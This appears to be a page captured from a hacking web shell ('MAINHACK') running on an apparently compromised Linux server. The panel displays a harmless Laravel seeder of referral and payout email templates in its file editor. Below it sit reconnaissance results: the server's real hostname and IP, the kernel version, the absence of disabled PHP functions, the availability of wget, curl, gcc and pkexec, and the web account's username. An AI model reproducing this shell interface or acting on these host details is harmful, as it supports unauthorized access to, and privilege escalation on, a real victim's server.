[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: ReferralComissionEmailTemplate.php
<?php namespace Database\Seeders; use Illuminate\Database\Seeder; use Illuminate\Support\Facades\DB; class ReferralComissionEmailTemplate extends Seeder { /** * Run the database seeds. */ public function run(): void { DB::table('email_templates')->insert([ [ "name" => "Referral Commission", "slug" => "REFERRAL_COMISSION", "subject" => "Congratulations! You've Earned a Referral Commission", "email_body" => "<p>Dear {{name}},</p> <p>I hope this email finds you well.</p> <p>We are thrilled to inform you that you have successfully earned a referral commission through our program! We deeply appreciate your support and your help in spreading the word about our Dot Accounts Soultion.</p> <h3>Commission Details:</h3> <ul> <li><strong>Referral Name:</strong> {{ReferredUserName}}</li> <li><strong>Date of Referral:</strong> {{ReferredDate}}</li> <li><strong>Commission Amount:</strong> {{commissionAmount}}</li> </ul> <p>We are always looking to improve our services and the experience we provide. If you have any feedback or suggestions, we would love to hear from you.</p>", "sms_body" => "", "notification_body" => "", "shortcode" => "{{name}} {{ReferredUserName}} {{ReferredDate}} {{commissionAmount}}", "email_status" => 0, "sms_status" => 0, "notification_status" => 0, "template_mode" => 1, ], [ "name" => "Approve Referral Payout", "slug" => "REFERRAL_PAYOUT_APPROVED", "subject" => "Your Payout Request has been approved", "email_body" => "<p>Dear <strong>{{name}}</strong>,</p> <p>We are pleased to inform you that a payout of <strong>{{amount}}</strong> has been successfully processed via your nominated payment method.</p> <p><strong>Details of the Transaction:</strong></p> <ul> <li><strong>Payout Amount:</strong> {{amount}}</li> <li><strong>Transaction Date:</strong> {{date}}</li> <li><strong>Payment Method:</strong> {{paymentMethod}}</li></ul><p>Thank you for your continued trust and cooperation.</p>", "sms_body" => "", "notification_body" => "", "shortcode" => "{{name}} {{amount}} {{date}} {{paymentMethod}}", "email_status" => 0, "sms_status" => 0, "notification_status" => 0, "template_mode" => 1, ], [ "name" => "Reject Referral Payout", "slug" => "REFERRAL_PAYOUT_REJECTED", "subject" => "Your Payout Request has been rejected", "email_body" => "<p>Dear <strong>{{name}}</strong>,</p> <p>We regret to inform you that your payment request for the amount of <strong>{{amount}}</strong>, submitted on <strong>{{requestDate}}</strong>, has been rejected.</p> <p><strong>Reason for Rejection:</strong></p> <p>{{rejectionReason}}</p> <p>We apologize for any inconvenience this may have caused and appreciate your understanding.</p>", "sms_body" => "", "notification_body" => "", "shortcode" => "{{name}} {{amount}} {{requestDate}} {{rejectionReason}}", "email_status" => 0, "sms_status" => 0, "notification_status" => 0, "template_mode" => 1, ], ]); } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002